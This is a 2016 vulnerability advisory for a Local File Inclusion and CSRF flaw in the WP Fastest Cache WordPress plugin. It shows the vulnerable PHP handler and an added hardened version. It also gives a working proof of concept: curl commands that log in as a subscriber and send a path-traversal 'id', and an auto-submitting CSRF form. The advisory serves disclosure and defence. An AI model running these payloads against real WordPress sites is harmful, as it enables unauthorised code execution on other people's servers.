WP Fastest Cache [Local File Inclusion]
Description
The WP Fastest Cache plugin registers the AJAX action wpfc_cdn_template_ajax_request, which is vulnerable to a Local File Inclusion attack.
This action is a privileged one so it is only available to registered users.
The vulnerable parameter is id.
The same vulnerability can also be exploited through a CSRF attack, because no CSRF protection (nonce check) is implemented. This means even an unregistered attacker can trigger it through the browser of a logged-in user.
Vulnerable code:
file: wp-fastest-cache/wpFastestCache.php
    public function wpfc_cdn_template_ajax_request_callback(){
        // No nonce or capability check precedes the include.
        ob_start();
        // $_POST["id"] is concatenated into the path unvalidated: a value such as
        // "../update_error" escapes templates/cdn/ and the target is executed as PHP.
        include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
        $content = ob_get_contents();
        ob_end_clean();

        $res = array("success" => false, "content" => "");
        // The existence check reuses the same unvalidated path and only runs
        // after the file has already been included.
        if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
            $res["success"] = true;
            $res["content"] = $content;
        }
        echo json_encode($res);
        exit;
    }
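As an added example that is not the plugin's own fix, the handler below shows how the three issues above would be addressed together: a nonce check against CSRF, a capability check so that being logged in is not sufficient, and an allowlist of template names taken from the files actually present in templates/cdn so the id can no longer traverse out of that directory. It assumes WPFC_MAIN_PATH is defined by the plugin as in the vulnerable code; the nonce action name and the callback name are assumptions made for this example.

```php
<?php
// Added example (not the plugin's own patch): a hardened version of the
// wpfc_cdn_template_ajax_request handler. Assumes WPFC_MAIN_PATH is defined
// by the plugin; the nonce action 'wpfc_cdn_template' and the callback name
// are assumptions made for this example.
add_action('wp_ajax_wpfc_cdn_template_ajax_request', 'wpfc_cdn_template_ajax_request_hardened');

function wpfc_cdn_template_ajax_request_hardened() {
    // CSRF: the request must carry a nonce bound to this action in the
    // 'nonce' POST field (issued with wp_create_nonce('wpfc_cdn_template')).
    check_ajax_referer('wpfc_cdn_template', 'nonce');

    // Authorization: rendering admin templates is restricted to users who
    // can manage plugin settings, not to every registered user.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'forbidden'), 403);
    }

    // Allowlist: only the basenames of the .php files that actually live in
    // templates/cdn are accepted, so '../' can never reach the include path.
    $dir = realpath(WPFC_MAIN_PATH . 'templates/cdn');
    $allowed = ($dir === false) ? array() : array_map(
        function ($file) { return basename($file, '.php'); },
        glob($dir . '/*.php') ?: array()
    );
    $id = isset($_POST['id']) ? (string) wp_unslash($_POST['id']) : '';
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $id) || !in_array($id, $allowed, true)) {
        wp_send_json_error(array('message' => 'unknown template'), 400);
    }

    // Defense in depth: confirm the resolved file still sits inside the
    // templates directory before it is included.
    $file = realpath($dir . '/' . $id . '.php');
    if ($file === false || strpos($file, $dir . DIRECTORY_SEPARATOR) !== 0) {
        wp_send_json_error(array('message' => 'invalid template path'), 400);
    }

    ob_start();
    include $file;
    $content = ob_get_clean();

    wp_send_json_success(array('content' => $content));
}
```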
PoC
Authenticated
# Log in as a subscriber and store the session cookie, then call the
# AJAX action with that cookie.
curl -XPOST 'http://sbwp1.dev/wp-login.php' \
  -d 'log=subscriber&pwd=password&wp-submit=Log+In' \
  -c '/tmp/Pan' \
&& curl -XPOST 'http://sbwp1.dev/wp-admin/admin-ajax.php' \
  -d 'action=wpfc_cdn_template_ajax_request&id=../update_error' \
  -b '/tmp/Pan'
CSRF
<form action="http://sbwp1.dev/wp-admin/admin-ajax.php" method="POST">
  <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
  <input type="hidden" name="id" value="../update_error" />
  <input type="submit" value="Submit form" />
</form>
INFO
- Date: 26 April 2016
- Author: Pan Vag
- Vendor: www.wpfastestcache.com
- Plugin: WP Fastest Cache
- Plugin version: 0.8.5.6
- WordPress version: 4.5
- ID: DWF-2016-87028